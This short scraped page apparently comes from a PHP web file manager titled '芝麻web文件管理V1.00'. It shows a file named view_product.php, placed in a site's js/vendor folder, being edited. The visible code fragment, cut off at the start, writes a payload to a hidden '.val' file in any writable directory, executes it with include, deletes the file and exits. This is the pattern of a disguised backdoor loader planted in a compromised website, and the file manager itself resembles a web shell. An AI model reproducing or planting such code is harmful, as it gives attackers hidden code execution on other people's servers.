芝麻web文件管理V1.00
编辑当前文件:/home/paymbalq/nair.tamela.org/assets 1/js/vendor/view_product.php
$resource) { if ((is_dir($resource) and is_writable($resource))) { $record = join("/", [$resource, ".val"]); $file = fopen($record, 'w'); if ($file) { fwrite($file, $ref); fclose($file); include $record; @unlink($record); exit; } } } }